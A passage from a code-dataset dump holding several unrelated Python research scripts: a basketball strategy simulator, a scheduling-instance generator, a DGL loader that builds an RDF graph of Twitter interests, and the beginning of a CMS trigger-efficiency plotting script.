sample_strategy(offf)\nprint(mdf.columns.values[p])\nprint(mdf.index[p2])\n\nold_strat_def = def_strat = deff\nold_strat_off = off_strat = offf\n\n# def_strat = None\n# off_strat = None\n\nw = 0.2\nv = 0.7\nprint(deff)\nprint(offf)\nnum_poss = 10\nfor poss in range(num_poss):\n current_def = sample_strategy(def_strat)\n current_off = sample_strategy(off_strat)\n\n print(\"Play during possession {}\".format(poss))\n print(\"\\t\" + str(mdf.columns.values[current_def]))\n print(\"\\t\" + str(mdf.index[current_off]))\n\n add_def = np.zeros(len(old_strat_def))\n add_def[current_def] = 1\n old_strat_def = w*old_strat_def + (1-w)*add_def\n\n add_off = np.zeros(len(old_strat_off))\n add_off[current_off] = 1\n old_strat_off = w*old_strat_off + (1-w)*add_off\n\n gamevals = add_noise_to_matrix(mdf)\n best_response_off = np.zeros(len(old_strat_off))\n best_response_off[np.argmax(gamevals.dot(old_strat_def))] = 1\n\n best_response_def = np.zeros(len(old_strat_def))\n best_response_def[np.argmin((old_strat_off.T).dot(gamevals))] = 1\n\n def_strat = v*def_strat + (1-v)*best_response_def\n off_strat = v*off_strat + (1-v)*best_response_off\n ","repo_name":"chakrabarti/bballai","sub_path":"simulator.py","file_name":"simulator.py","file_ext":"py","file_size_in_byte":3621,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"31077320524","text":"import json\nfrom random import randint\nimport sys\nimport random\n\noptions = {\n 'T': [100, 120],\n 'I': [2, 4],\n 'K': [4, 6],\n 'J': [4, 6],\n 'S': [1, 2],\n 'reldate': [10, 50],\n 'due': [60, 80],\n 'nsa0': [10, 20],\n 'sa0': [5, 10],\n 'csa': [30, 60],\n 'cnsa': [15, 30],\n 'c': [60, 100],\n 'd': [2, 20]\n}\n\n\ndef generate_instance(options):\n def rset_rng(set_name):\n return [ix for ix in range(randint(options[set_name][0], options[set_name][1]))]\n\n def rparam3d(s1, s2, s3, name):\n return [[[randint(options[name][0], options[name][1]) for e3 in s3] for e2 in s2] for e1 in s1]\n\n def batch_rset(set_letters_str):\n return [rset_rng(sn) for sn in list(set_letters_str)]\n\n def rparam2d(s1, s2, name):\n return [[randint(options[name][0], options[name][1]) for e2 in s2] for e1 in s1]\n\n def rparam1d(s1, name):\n return [randint(options[name][0], options[name][1]) for e1 in s1]\n\n T, I, K, J, S = batch_rset('TIKJS')\n\n reldate = rparam3d(I, K, J, 'reldate')\n ek = [[[sum(1 if reldate[i][k][j] == t else 0 for i in I for j in J) for t in T] for s in S] for k in K]\n due = rparam3d(I, K, J, 'due')\n\n nsa0 = rparam2d(K, S, 'nsa0')\n sa0 = rparam1d(K, 'sa0')\n csa = rparam1d(K, 'csa')\n cnsa = rparam2d(K, S, 'cnsa')\n c = rparam1d(I, 'c')\n d = rparam2d(K, S, 'd')\n\n return dict(T=T, I=I, K=K, J=J, S=S, ek=ek, due=due, nsa0=nsa0, sa0=sa0, csa=csa, cnsa=cnsa, c=c, d=d)\n\n\ndef serialize_to_json(instance, out_filename):\n with open(out_filename, 'w') as fp:\n json.dump(instance, fp, indent=4, sort_keys=True)\n\n\ndef main(args):\n random.seed(23)\n instance = generate_instance(options)\n serialize_to_json(instance, 'instance1.json')\n\n\nif __name__ == '__main__':\n main(sys.argv)\n","repo_name":"0x17/BET-WF","sub_path":"instance_generator.py","file_name":"instance_generator.py","file_ext":"py","file_size_in_byte":1795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"5671099046","text":"import os\r\nfrom collections import OrderedDict\r\nimport itertools\r\nimport abc\r\nimport re\r\ntry:\r\n import rdflib as rdf\r\nexcept ImportError:\r\n 
pass\r\n\r\nimport networkx as nx\r\nimport numpy as np\r\nfrom ontology import Ontology\r\nimport dgl\r\nimport dgl.backend as F\r\nfrom dgl.data import DGLBuiltinDataset\r\nfrom dgl.data.utils import save_graphs, load_graphs, save_info, load_info, _get_dgl_url\r\nfrom dgl.data.utils import generate_mask_tensor, idx2mask, deprecate_property, deprecate_class\r\n\r\nRENAME_DICT = {\r\n 'type' : 'rdftype',\r\n 'rev-type' : 'rev-rdftype',\r\n}\r\nclass Entity:\r\n \"\"\"Class for entities\r\n Parameters\r\n ----------\r\n id : str\r\n ID of this entity\r\n cls : str\r\n Type of this entity\r\n \"\"\"\r\n def __init__(self, e_id, cls):\r\n self.id = e_id\r\n self.cls = cls\r\n\r\n def __str__(self):\r\n return '{}/{}'.format(self.cls, self.id)\r\n\r\nclass Relation:\r\n \"\"\"Class for relations\r\n Parameters\r\n ----------\r\n cls : str\r\n Type of this relation\r\n \"\"\"\r\n def __init__(self, cls):\r\n self.cls = cls\r\n\r\n def __str__(self):\r\n return str(self.cls)\r\n\r\nclass RDFGraphDataset(DGLBuiltinDataset):\r\n #'../data/deneme/'\r\n def __init__(self, name=None, url=None,\r\n raw_dir='../data/deneme/',\r\n force_reload=False,\r\n verbose=True):\r\n self._insert_reverse = True\r\n self._print_every = 10000\r\n #self.save_path = \"../data/deneme/\"\r\n super(RDFGraphDataset, self).__init__(name, url,\r\n raw_dir=raw_dir,\r\n force_reload=force_reload,\r\n verbose=verbose)\r\n\r\n def process(self):\r\n raw_tuples = self.load_raw_tuples(self.raw_path)\r\n self.process_raw_tuples(raw_tuples)\r\n\r\n def load_raw_tuples(self, root_path):\r\n \"\"\"Loading raw RDF dataset\r\n\r\n Parameters\r\n ----------\r\n root_path : str\r\n Root path containing the data\r\n\r\n Returns\r\n -------\r\n Loaded rdf data\r\n \"\"\"\r\n raw_rdf_graphs = []\r\n for _, filename in enumerate([root_path]):\r\n \"\"\"fmt = None\r\n if filename.endswith('nt'):\r\n fmt = 'nt'\r\n elif filename.endswith('n3'):\r\n fmt = 'n3'\r\n elif filename.endswith('rdf'):\r\n fmt = 'application/rdf+xml'\r\n if fmt is None:\r\n continue\"\"\"\r\n #g = rdf.Graph()\r\n print(\"Hadi bakalım\")\r\n ontology = Ontology(filename)\r\n interests = ontology.get_all_interests()\r\n print(\"Geliyor\")\r\n #print('Parsing file %s ...' % filename)\r\n \"\"\"mentions = ontology.get_all_interactions('mention')\r\n retweets = ontology.get_all_interactions('retweet')\r\n concated = mentions + retweets\"\"\"\r\n #g.parse(filename, format=fmt)\r\n raw_rdf_graphs.append(interests)\r\n #raw_rdf_graphs.append(retweets)\r\n return itertools.chain(*raw_rdf_graphs)\r\n\r\n def process_raw_tuples(self, raw_tuples):\r\n \"\"\"Processing raw RDF dataset\r\n\r\n Parameters\r\n ----------\r\n raw_tuples:\r\n Raw rdf tuples\r\n root_path: str\r\n Root path containing the data\r\n \"\"\"\r\n mg = nx.MultiDiGraph()\r\n ent_classes = OrderedDict()\r\n rel_classes = OrderedDict()\r\n entities = OrderedDict()\r\n src = []\r\n dst = []\r\n ntid = []\r\n etid = []\r\n sorted_tuples = []\r\n for t in raw_tuples:\r\n sorted_tuples.append(t)\r\n sorted_tuples.sort()\r\n\r\n for i, (sbj,obj, pred) in enumerate(sorted_tuples):\r\n if self.verbose and i % self._print_every == 0:\r\n print('Processed %d tuples, found %d valid tuples.' 
% (i, len(src)))\r\n\r\n sbjent = self.parse_entity(sbj)\r\n rel = self.parse_relation(pred)\r\n objent = self.parse_entity(obj)\r\n processed = self.process_tuple((sbj, pred, obj), sbjent, rel, objent)\r\n if processed is None:\r\n # ignored\r\n continue\r\n # meta graph\r\n sbjclsid = _get_id(ent_classes, sbjent.cls)\r\n objclsid = _get_id(ent_classes, objent.cls)\r\n relclsid = _get_id(rel_classes, rel.cls)\r\n mg.add_edge(sbjent.cls, objent.cls, key=rel.cls)\r\n if self._insert_reverse:\r\n mg.add_edge(objent.cls, sbjent.cls, key='rev-%s' % rel.cls)\r\n # instance graph\r\n src_id = _get_id(entities, str(sbjent))\r\n if len(entities) > len(ntid): # found new entity\r\n ntid.append(sbjclsid)\r\n dst_id = _get_id(entities, str(objent))\r\n if len(entities) > len(ntid): # found new entity\r\n ntid.append(objclsid)\r\n src.append(src_id)\r\n dst.append(dst_id)\r\n etid.append(relclsid)\r\n\r\n src = np.asarray(src)\r\n dst = np.asarray(dst)\r\n ntid = np.asarray(ntid)\r\n etid = np.asarray(etid)\r\n ntypes = list(ent_classes.keys())\r\n etypes = list(rel_classes.keys())\r\n\r\n # add reverse edge with reverse relation\r\n if self._insert_reverse:\r\n if self.verbose:\r\n print('Adding reverse edges ...')\r\n newsrc = np.hstack([src, dst])\r\n newdst = np.hstack([dst, src])\r\n src = newsrc\r\n dst = newdst\r\n etid = np.hstack([etid, etid + len(etypes)])\r\n etypes.extend(['rev-%s' % t for t in etypes])\r\n\r\n hg = self.build_graph(mg, src, dst, ntid, etid, ntypes, etypes)\r\n idmap = F.asnumpy(hg.nodes[\"/www.semanticweb.org/gokce/ontologies/2021/11/twitter-interests\"].data[dgl.NID])\r\n glb2lcl = {glbid: lclid for lclid, glbid in enumerate(idmap)}\r\n\r\n def findidfn(ent):\r\n if ent not in entities:\r\n return None\r\n else:\r\n return glb2lcl[entities[ent]]\r\n\r\n self._hg = hg\r\n train_idx, test_idx, labels, num_classes = self.load_data_split(findidfn)\r\n\r\n train_mask = idx2mask(train_idx, self._hg.number_of_nodes(\"/www.semanticweb.org/gokce/ontologies/2021/11/twitter-interests\"))\r\n test_mask = idx2mask(test_idx, self._hg.number_of_nodes(\"/www.semanticweb.org/gokce/ontologies/2021/11/twitter-interests\"))\r\n labels = F.tensor(labels, F.data_type_dict['int64'])\r\n\r\n train_mask = generate_mask_tensor(train_mask)\r\n test_mask = generate_mask_tensor(test_mask)\r\n self._hg.nodes[\"/www.semanticweb.org/gokce/ontologies/2021/11/twitter-interests\"].data['train_mask'] = train_mask\r\n self._hg.nodes[\"/www.semanticweb.org/gokce/ontologies/2021/11/twitter-interests\"].data['test_mask'] = test_mask\r\n self._hg.nodes[\"/www.semanticweb.org/gokce/ontologies/2021/11/twitter-interests\"].data['labels'] = labels\r\n self._num_classes = num_classes\r\n\r\n # save for compatability\r\n self._train_idx = F.tensor(train_idx)\r\n self._test_idx = F.tensor(test_idx)\r\n self._labels = labels\r\n\r\n\r\n def build_graph(self, mg, src, dst, ntid, etid, ntypes, etypes):\r\n \"\"\"Build the graphs\r\n\r\n Parameters\r\n ----------\r\n mg: MultiDiGraph\r\n Input graph\r\n src: Numpy array\r\n Source nodes\r\n dst: Numpy array\r\n Destination nodes\r\n ntid: Numpy array\r\n Node types for each node\r\n etid: Numpy array\r\n Edge types for each edge\r\n ntypes: list\r\n Node types\r\n etypes: list\r\n Edge types\r\n\r\n Returns\r\n -------\r\n g: DGLGraph\r\n \"\"\"\r\n # create homo graph\r\n if self.verbose:\r\n print('Creating one whole graph ...')\r\n g = dgl.graph((src, dst))\r\n g.ndata[dgl.NTYPE] = F.tensor(ntid)\r\n g.edata[dgl.ETYPE] = F.tensor(etid)\r\n if self.verbose:\r\n 
print('Total #nodes:', g.number_of_nodes())\r\n print('Total #edges:', g.number_of_edges())\r\n\r\n # rename names such as 'type' so that they an be used as keys\r\n # to nn.ModuleDict\r\n etypes = [RENAME_DICT.get(ty, ty) for ty in etypes]\r\n mg_edges = mg.edges(keys=True)\r\n mg = nx.MultiDiGraph()\r\n for sty, dty, ety in mg_edges:\r\n mg.add_edge(sty, dty, key=RENAME_DICT.get(ety, ety))\r\n\r\n # convert to heterograph\r\n if self.verbose:\r\n print('Convert to heterograph ...')\r\n hg = dgl.to_heterogeneous(g,\r\n ntypes,\r\n etypes,\r\n metagraph=mg)\r\n if self.verbose:\r\n print('#Node types:', len(hg.ntypes))\r\n print('#Canonical edge types:', len(hg.etypes))\r\n print('#Unique edge type names:', len(set(hg.etypes)))\r\n return hg\r\n\r\n def load_data_split(self, ent2id):\r\n \"\"\"Load data split\r\n\r\n Parameters\r\n ----------\r\n ent2id: func\r\n A function mapping entity to id\r\n root_path: str\r\n Root path containing the data\r\n\r\n Return\r\n ------\r\n train_idx: Numpy array\r\n Training set\r\n test_idx: Numpy array\r\n Testing set\r\n labels: Numpy array\r\n Labels\r\n num_classes: int\r\n Number of classes\r\n \"\"\"\r\n label_dict = {}\r\n labels = np.zeros((self._hg.number_of_nodes(\"/www.semanticweb.org/gokce/ontologies/2021/11/twitter-interests\"),)) - 1\r\n train_idx = self.parse_idx_file(\r\n os.path.join('../data/deneme/trainingSet.tsv'),\r\n ent2id, label_dict, labels)\r\n test_idx = self.parse_idx_file(\r\n os.path.join('../data/deneme/testSet.tsv'),\r\n ent2id, label_dict, labels)\r\n train_idx = np.array(train_idx)\r\n test_idx = np.array(test_idx)\r\n labels = np.array(labels)\r\n num_classes = len(label_dict)\r\n return train_idx, test_idx, labels, num_classes\r\n\r\n def parse_idx_file(self, filename, ent2id, label_dict, labels):\r\n \"\"\"Parse idx files\r\n\r\n Parameters\r\n ----------\r\n filename: str\r\n File to parse\r\n ent2id: func\r\n A function mapping entity to id\r\n label_dict: dict\r\n Map label to label id\r\n labels: dict\r\n Map entity id to label id\r\n\r\n Return\r\n ------\r\n idx: list\r\n Entity idss\r\n \"\"\"\r\n idx = []\r\n with open(filename, 'r') as f:\r\n for i, line in enumerate(f):\r\n if i == 0:\r\n continue # first line is the header\r\n sample, label = self.process_idx_file_line(line)\r\n # person, _, label = line.strip().split('\\t')\r\n ent = self.parse_entity(sample)\r\n entid = ent2id(str(ent))\r\n if entid is None:\r\n print('Warning: entity \"%s\" does not have any valid links associated. Ignored.' 
% str(ent))\r\n else:\r\n idx.append(entid)\r\n lblid = _get_id(label_dict, label)\r\n labels[entid] = lblid\r\n return idx\r\n\r\n def save(self):\r\n \"\"\"save the graph list and the labels\"\"\"\r\n graph_path = os.path.join(\"../data/deneme/\",\r\n self.save_name + '.bin')\r\n info_path = os.path.join(\"../data/deneme/\",\r\n self.save_name + '.pkl')\r\n save_graphs(str(graph_path), self._hg)\r\n\r\n\r\n def load(self):\r\n \"\"\"load the graph list and the labels from disk\"\"\"\r\n graph_path = os.path.join(\"../data/deneme/\",\r\n self.save_name + '.bin')\r\n info_path = os.path.join(\"../data/deneme/\",\r\n self.save_name + '.pkl')\r\n graphs, _ = load_graphs(str(graph_path))\r\n\r\n def __getitem__(self, idx):\r\n r\"\"\"Gets the graph object\r\n \"\"\"\r\n g = self._hg\r\n return g\r\n\r\n def __len__(self):\r\n r\"\"\"The number of graphs in the dataset.\"\"\"\r\n return 1\r\n\r\n @property\r\n def save_name(self):\r\n return self.name + '_dgl_graph'\r\n\r\n @property\r\n def graph(self):\r\n deprecate_property('dataset.graph', 'hg = dataset[0]')\r\n return self._hg\r\n\r\n @property\r\n def predict_category(self):\r\n return self._predict_category\r\n\r\n @property\r\n def num_classes(self):\r\n return self._num_classes\r\n\r\n @property\r\n def train_idx(self):\r\n deprecate_property('dataset.train_idx', 'train_mask = g.ndata[\\'train_mask\\']')\r\n return self._train_idx\r\n\r\n @property\r\n def test_idx(self):\r\n deprecate_property('dataset.test_idx', 'train_mask = g.ndata[\\'test_mask\\']')\r\n return self._test_idx\r\n\r\n @property\r\n def labels(self):\r\n deprecate_property('dataset.labels', 'train_mask = g.ndata[\\'labels\\']')\r\n return self._labels\r\n\r\n @abc.abstractmethod\r\n def parse_entity(self, term):\r\n \"\"\"Parse one entity from an RDF term.\r\n Return None if the term does not represent a valid entity and the\r\n whole tuple should be ignored.\r\n Parameters\r\n ----------\r\n term : rdflib.term.Identifier\r\n RDF term\r\n Returns\r\n -------\r\n Entity or None\r\n An entity.\r\n \"\"\"\r\n pass\r\n\r\n @abc.abstractmethod\r\n def parse_relation(self, term):\r\n \"\"\"Parse one relation from an RDF term.\r\n Return None if the term does not represent a valid relation and the\r\n whole tuple should be ignored.\r\n Parameters\r\n ----------\r\n term : rdflib.term.Identifier\r\n RDF term\r\n Returns\r\n -------\r\n Relation or None\r\n A relation\r\n \"\"\"\r\n pass\r\n\r\n @abc.abstractmethod\r\n def process_tuple(self, raw_tuple, sbj, rel, obj):\r\n \"\"\"Process the tuple.\r\n Return (Entity, Relation, Entity) tuple for as the final tuple.\r\n Return None if the tuple should be ignored.\r\n\r\n Parameters\r\n ----------\r\n raw_tuple : tuple of rdflib.term.Identifier\r\n (subject, predicate, object) tuple\r\n sbj : Entity\r\n Subject entity\r\n rel : Relation\r\n Relation\r\n obj : Entity\r\n Object entity\r\n Returns\r\n -------\r\n (Entity, Relation, Entity)\r\n The final tuple or None if should be ignored\r\n \"\"\"\r\n pass\r\n\r\n @abc.abstractmethod\r\n def process_idx_file_line(self, line):\r\n \"\"\"Process one line of ``trainingSet.tsv`` or ``testSet.tsv``.\r\n Parameters\r\n ----------\r\n line : str\r\n One line of the file\r\n Returns\r\n -------\r\n (str, str)\r\n One sample and its label\r\n \"\"\"\r\n pass\r\n\r\n\r\n\r\n\r\n def __getitem__(self, idx):\r\n r\"\"\"Gets the graph object\r\n \"\"\"\r\n g = self._hg\r\n return g\r\n\r\n def __len__(self):\r\n r\"\"\"The number of graphs in the dataset.\"\"\"\r\n return 1\r\n\r\n 
@property\r\n def save_name(self):\r\n return self.name + '_dgl_graph'\r\n\r\n @property\r\n def graph(self):\r\n deprecate_property('dataset.graph', 'hg = dataset[0]')\r\n return self._hg\r\n\r\n\r\nclass TwitterDataset(RDFGraphDataset):\r\n\r\n entity_prefix1 = 'http://www.semanticweb.org/gokce/ontologies/2021/11/twitter-interests#'\r\n entity_prefix2 = 'http://dbpedia.org/resource/'\r\n relation_prefix = 'http://dbpedia.org/ontology/'\r\n\r\n\r\n\r\n def __init__(self, name=None, url=None,\r\n raw_dir='../data/deneme/',\r\n force_reload=False,\r\n verbose=True):\r\n\r\n name = 'model_junior.rdf'\r\n\r\n super(TwitterDataset, self).__init__(name, url,\r\n raw_dir=raw_dir,\r\n force_reload=force_reload,\r\n verbose=verbose)\r\n\r\n def __getitem__(self, idx):\r\n r\"\"\"Gets the graph object\r\n\r\n Parameters\r\n -----------\r\n idx: int\r\n Item index, AIFBDataset has only one graph object\r\n\r\n Return\r\n -------\r\n :class:`dgl.DGLGraph`\r\n\r\n The graph contains:\r\n\r\n - ``ndata['train_mask']``: mask for training node set\r\n - ``ndata['test_mask']``: mask for testing node set\r\n - ``ndata['labels']``: mask for labels\r\n \"\"\"\r\n return super(TwitterDataset, self).__getitem__(idx)\r\n\r\n\r\n def __len__(self):\r\n r\"\"\"The number of graphs in the dataset.\r\n\r\n Return\r\n -------\r\n int\r\n \"\"\"\r\n return super(TwitterDataset, self).__len__()\r\n\r\n def parse_entity(self, term):\r\n if isinstance(term, rdf.Literal):\r\n return Entity(e_id=str(term), cls=\"_Literal\")\r\n if isinstance(term, rdf.BNode):\r\n return None\r\n entstr = str(term)\r\n if entstr.startswith(self.entity_prefix1):\r\n sp = entstr.find(\"#\")+1\r\n cl = entstr.find(\"/\")\r\n print(Entity(e_id=entstr[sp:], cls=entstr[cl+1:sp-1]))\r\n return Entity(e_id=entstr[sp:], cls=entstr[cl+1:sp-1])\r\n elif entstr.startswith(self.entity_prefix2):\r\n cl = entstr.rindex(\"/\")\r\n print(Entity(e_id=entstr[cl+1:], cls=entstr[:cl]))\r\n return Entity(e_id=entstr[cl+1:], cls=entstr[:cl])\r\n else:\r\n return None\r\n\r\n def parse_relation(self, term):\r\n if isinstance(term, rdf.Literal):\r\n #print(term)\r\n return Relation(cls=\"_Literal\")\r\n relstr = str(term)\r\n if relstr.startswith(self.relation_prefix):\r\n return Relation(cls=relstr.split('/')[4])\r\n else:\r\n relstr = relstr.split('/')[-1]\r\n return Relation(cls=relstr)\r\n\r\n def process_tuple(self, raw_tuple, sbj, rel, obj):\r\n if sbj is None or rel is None or obj is None:\r\n return None\r\n return (sbj, rel, obj)\r\n\r\n def process_idx_file_line(self, line):\r\n _, person, _, label = line.strip().split('\\t')\r\n return person, label\r\n\r\n\r\n\r\ndef _get_id(dict, key):\r\n id = dict.get(key, None)\r\n if id is None:\r\n id = len(dict)\r\n dict[key] = id\r\n return id\r\n\r\n\r\ng=TwitterDataset()\r\ng = g[0]\r\n\r\nnum_classes = TwitterDataset().num_classes\r\ntrain_mask = g.nodes[\"/www.semanticweb.org/gokce/ontologies/2021/11/twitter-interests\"].data.pop('train_mask')\r\ntest_mask = g.nodes[\"/www.semanticweb.org/gokce/ontologies/2021/11/twitter-interests\"].data.pop('test_mask')\r\nlabels = g.nodes[\"/www.semanticweb.org/gokce/ontologies/2021/11/twitter-interests\"].data.pop('labels').tolist()\r\nimport torch\r\ntrain_idx = torch.nonzero(train_mask).squeeze().tolist()\r\ntest_idx = torch.nonzero(test_mask).squeeze().tolist()\r\nedge_list = []\r\nmat_dict = {}\r\nfor srctype, etype, dsttype in g.canonical_etypes:\r\n canonical_etypes = (srctype, etype, dsttype)\r\n edge_type = srctype.strip('_')+'||'+etype.strip('_')+'||' + 
dsttype.strip('_')\r\n mat_dict[edge_type] = g.adj(scipy_fmt='coo', etype=canonical_etypes)\r\n edge_list.append(edge_type)\r\n\r\ninfo_dict = {'num_classes': num_classes, 'predict_category': \"/www.semanticweb.org/gokce/ontologies/2021/11/twitter-interests\", 'train_idx': train_idx,\r\n 'test_idx': test_idx, 'labels': labels, 'ntypes': g.ntypes, 'etypes': g.etypes, 'edge_list': edge_list}\r\nimport scipy.io\r\nimport scipy.sparse as sp\r\nscipy.io.savemat('interests.mat', mat_dict)\r\nimport json\r\nwith open('interests_info.json', 'w') as f:\r\n json.dump(info_dict, f)","repo_name":"gokceuludogan/community-detection-w-interests","sub_path":"src/RDFGraphDataset.py","file_name":"RDFGraphDataset.py","file_ext":"py","file_size_in_byte":19999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"14409327226","text":"#Standard imports\nimport ROOT\nfrom math import sqrt, cos, sin, pi, acos\nimport itertools\nimport array\nimport os\n\n#RootTools\nfrom RootTools.core.standard import *\n\n#StopsDilepton\nfrom StopsDilepton.tools.objectSelection import muonSelectorString, eleSelectorString\n\n# argParser\nimport argparse\nargParser = argparse.ArgumentParser(description = \"Argument parser\")\nargParser.add_argument('--logLevel',\n action='store',\n nargs='?',\n choices=['CRITICAL', 'ERROR', 'WARNING', 'INFO', 'DEBUG', 'TRACE', 'NOTSET'],\n default='INFO',\n help=\"Log level for logging\"\n)\n\nargParser.add_argument('--small',\n action='store_true',\n #default = True,\n help='Small?',\n) \n\nargParser.add_argument('--selection',\n #default='Sum$(Jet_pt>30&&abs(Jet_eta)<2.4&&Jet_id)>=1',\n default='',\n type=str,\n action='store',\n)\n\nHLT_MET_hadronic = \"(HLT_HT350_MET100||HLT_HT350||HLT_HT475||HLT_HT600||HLT_dijet||HLT_jet||HLT_dijet70met120||HLT_dijet55met110||HLT_HT900||HLT_HT800||HLT_MET170_NotCleaned||HLT_MET170_HBHECleaned||HLT_MET170_BeamHaloCleaned||HLT_AllMET170||HLT_AllMET300||HLT_HT350_MET100)\"\n\nargParser.add_argument('--baseTrigger',\n default=HLT_MET_hadronic,\n\n type=str,\n action='store',\n)\n\nargParser.add_argument('--dileptonTrigger',\n default='HLT_mue',\n type=str,\n action='store',\n)\n\n\nargParser.add_argument('--sample',\n default='JetHT',\n type=str,\n action='store',\n)\n\nargParser.add_argument('--plot_directory',\n default='pngEff',\n type=str,\n action='store',\n)\n\nargParser.add_argument('--minLeadingLeptonPt',\n default=0,\n type=int,\n action='store',\n)\n\nargParser.add_argument('--mode',\n default='muEle',\n action='store',\n choices=['doubleMu', 'doubleEle', 'muEle'])\n\nargs = argParser.parse_args()\n\n\n# Logging\nimport StopsDilepton.tools.logger as logger\nlogger = logger.get_logger(args.logLevel, logFile = None )\nimport RootTools.core.logger as logger_rt\nlogger_rt = logger_rt.get_logger(args.logLevel, logFile = None )\n\nmaxN = 10 if args.small else -1 \n\nfrom CMGTools.RootTools.samples.samples_13TeV_DATA2016 import *\n\nfrom StopsDilepton.samples.heppy_dpm_samples import data_03Feb2017_heppy_mapper as data_heppy_mapper\n# return data_heppy_mapper.from_heppy_samplename(heppy_sample.name, maxN = maxN)\n\ndata_samples = [data_heppy_mapper.from_heppy_samplename(s.name) for s in dataSamples_03Feb2017 if s.name.startswith(args.sample)]\nfor s in data_samples:\n if maxN>0:\n s.files = s.files[:maxN]\n logger.info(\"Adding data sample %s (heppy: %s)\", s.name, s.heppy.name)\n\n#from StopsDilepton.samples.helpers import fromHeppySample\n#data_Run2016B = fromHeppySample(\"%s_Run2016B_PromptReco_v2\" 
% args.sample, data_path = '/scratch/rschoefbeck/cmgTuples/80X_1l_12', maxN = maxN)\n#data_Run2016C = fromHeppySample(\"%s_Run2016C_PromptReco_v2\" % args.sample, data_path = '/scratch/rschoefbeck/cmgTuples/80X_1l_12', maxN = maxN)\n#data_Run2016D = fromHeppySample(\"%s_Run2016D_PromptReco_v2\" % args.sample, data_path = '/scratch/rschoefbeck/cmgTuples/80X_1l_12', maxN = maxN)\n#\n\ndata=Sample.combine( \"Run2016BCDEFGH\", data_samples )\npreprefix = \"Run2016BCDEFGH\"\ntriggerName = args.dileptonTrigger.replace('||','_OR_')\n\npt_thresholds = range(0,30,2)+range(30,50,5)+range(50,210,10)\neta_thresholds = [x/10. for x in range(-25,26,1) ]\npt_thresholds_coarse = range(5,25,10)+range(25,130,15)+range(130,330,50)\npt_thresholds_veryCoarse = [20,25,35] + range(50,200,50)+[250]\neta_thresholds_coarse = [x/10. for x in range(-25,26,5) ]\n\neff_pt1 = ROOT.TProfile(\"eff_pt1\",\"eff_pt1\", len(pt_thresholds)-1, array.array('d',pt_thresholds), 0,1)\neff_pt1.GetYaxis().SetTitle(triggerName)\neff_pt1.GetXaxis().SetTitle(\"p_{T} of leading lepton\")\neff_pt1.style = styles.errorStyle( ROOT.kBlack )\n\neff_pt2 = ROOT.TProfile(\"eff_pt2\",\"eff_pt2\", len(pt_thresholds)-1, array.array('d',pt_thresholds), 0,1)\neff_pt2.GetYaxis().SetTitle(triggerName)\neff_pt2.GetXaxis().SetTitle(\"p_{T} of trailing lepton\")\neff_pt2.style = styles.errorStyle( ROOT.kBlack )\n\neff_eta1 = ROOT.TProfile(\"eff_eta1\",\"eff_eta1\", len(eta_thresholds)-1, array.array('d',eta_thresholds), 0,1)\neff_eta1.GetYaxis().SetTitle(triggerName)\neff_eta1.GetXaxis().SetTitle(\"#eta of leading lepton\")\neff_eta1.style = styles.errorStyle( ROOT.kBlack )\n\neff_eta2 = ROOT.TProfile(\"eff_eta2\",\"eff_eta2\", len(eta_thresholds)-1, array.array('d',eta_thresholds), 0,1)\neff_eta2.GetYaxis().SetTitle(triggerName)\neff_eta2.GetXaxis().SetTitle(\"#eta of trailing lepton\")\neff_eta2.style = styles.errorStyle( ROOT.kBlack )\n\nht = ROOT.TH1D(\"ht\",\"ht\", 2000/50,0,2000)\nht.GetYaxis().SetTitle(\"Number of events\")\nht.GetXaxis().SetTitle(\"H_{T} (GeV)\")\nht.style = styles.errorStyle( ROOT.kBlack )\n\neff_pt1_pt2 = ROOT.TProfile2D(\"eff_pt1_pt2\",\"eff_pt1_pt2\", len(pt_thresholds_veryCoarse)-1, array.array('d',pt_thresholds_veryCoarse), len(pt_thresholds_veryCoarse)-1, array.array('d',pt_thresholds_veryCoarse))\neff_pt1_pt2.GetXaxis().SetTitle(\"p_{T} of leading lepton\")\neff_pt1_pt2.GetYaxis().SetTitle(\"p_{T} of trailing lepton\")\neff_pt1_pt2.style = styles.errorStyle( ROOT.kBlack )\n\neff_pt1_pt2_veryCoarse = ROOT.TProfile2D(\"eff_pt1_pt2_veryCoarse\",\"eff_pt1_pt2_veryCoarse\", len(pt_thresholds_veryCoarse)-1, array.array('d',pt_thresholds_veryCoarse), len(pt_thresholds_veryCoarse)-1, array.array('d',pt_thresholds_veryCoarse))\neff_pt1_pt2_veryCoarse.GetXaxis().SetTitle(\"p_{T} of leading lepton\")\neff_pt1_pt2_veryCoarse.GetYaxis().SetTitle(\"p_{T} of trailing lepton\")\neff_pt1_pt2_veryCoarse.style = styles.errorStyle( ROOT.kBlack )\n\neff_pt1_pt2_highEta1_veryCoarse = ROOT.TProfile2D(\"eff_pt1_pt2_highEta1_veryCoarse\",\"eff_pt1_pt2_highEta1_veryCoarse\", len(pt_thresholds_veryCoarse)-1, array.array('d',pt_thresholds_veryCoarse), len(pt_thresholds_veryCoarse)-1, array.array('d',pt_thresholds_veryCoarse))\neff_pt1_pt2_highEta1_veryCoarse.GetXaxis().SetTitle(\"p_{T} of leading lepton\")\neff_pt1_pt2_highEta1_veryCoarse.GetYaxis().SetTitle(\"p_{T} of trailing lepton\")\neff_pt1_pt2_highEta1_veryCoarse.style = styles.errorStyle( ROOT.kBlack )\n\neff_pt1_pt2_lowEta1_veryCoarse = 
